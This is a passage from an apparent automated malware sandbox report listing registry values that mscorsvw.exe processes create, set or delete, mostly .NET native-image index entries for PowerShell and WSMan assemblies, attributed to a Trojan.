"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\268e923b\24\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FD"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ConfigMask" = "4361"
"MVID" = "72 A5 E7 88 C4 07 6B 67 EC 68 97 DA DB 9C 00 B6"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FD"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 03 7A F7 3D E3 F0 63 39 71 AC 16 39 CC D3 14"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"DisplayName" = "Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"LastModTime" = "02 FD A4 CF 6D BF D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"SIG" = "EC 74 C4 48 ED 80 64 4D BD A4 D7 78 32 8C 96 D8"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "95"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
The process mscorsvw.exe:2432 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F D1 16 83 88 6B 6F 3C B6 19 6C E1 54 A1 CE 2B"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3888 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"DisplayName" = "Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\3fa824d2\11\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"MVID" = "EA F7 7E C3 AE 2E A1 73 83 BF A6 FB A9 3D 37 37"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 B2 22 13 19 74 7F 8C EF 17 33 3B BA 64 50 A0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "97"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\3ef4663b\f\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"SIG" = "7B 5D F0 E6 43 C6 6F 48 85 FF C5 61 E9 E4 D2 1B"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"DisplayName" = "Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"LastModTime" = "70 FE 85 CF 6D BF D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
The process mscorsvw.exe:2344 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\643db07b\27\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
"ConfigMask" = "4361"
"MVID" = "93 92 67 97 48 6D 4F 7A 9B 69 C5 87 5F F3 FC 30"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ConfigString" = "ZAP--0000-0000"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"LastModTime" = "12 A7 3F CB 6D BF D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\43970528\4b\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 9D 61 63 15 22 8F 42 08 89 E9 C3 04 CB 0C 7B"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"SIG" = "EF D0 54 19 D0 F5 86 44 A9 62 4E 86 6A 5F 6C 6E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "93"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
The process mscorsvw.exe:2052 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index63]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"DisplayName" = "Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"SIG" = "65 39 A0 50 E9 4F 14 4B 85 A8 07 D9 00 B9 C9 79"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index63]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"LastModTime" = "A6 DC B6 CB 6D BF D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"MVID" = "B1 10 6C EC A9 F5 C8 9E A5 7E 9E CD 46 C7 CF 57"
"DisplayName" = "Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"DisplayName" = "Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "89 C2 C9 EF 83 00 0A 13 02 1F 7D 5F F5 87 88 AA"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "99"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"LastModTime" = "46 02 DD CB 6D BF D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\41470f34\2\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"SIG" = "EC D0 CD 16 68 09 9B 47 85 11 78 36 0F BB 3D 11"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]
The process mscorsvw.exe:2056 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE 3A 12 D4 D2 09 6C 5B C9 5A A3 0D 31 82 9B 6B"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:1612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"LastModTime" = "40 8A 05 CC 6D BF D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"SIG" = "5D B3 1D FA D7 A3 2D 4A 9D D3 B0 41 D1 BC 36 E6"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"LastModTime" = "7E 71 C8 CA 6D BF D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"DisplayName" = "System.Management.Automation,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MissingDependencies" = "Microsoft.BackgroundIntelligentTransfer.Management.Interop,6.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MVID" = "FD 3E DC DF A9 CE 60 AB AC 35 20 81 46 18 44 95"
"ConfigMask" = "4361"
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D 08 E4 C9 0B 11 10 4B A3 EF 9C 23 A6 EC 54 AD"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "90"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"SIG" = "85 42 9C 0A C5 DF B1 48 A5 8E 44 2E FB 91 9D 84"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"Status" = "2"
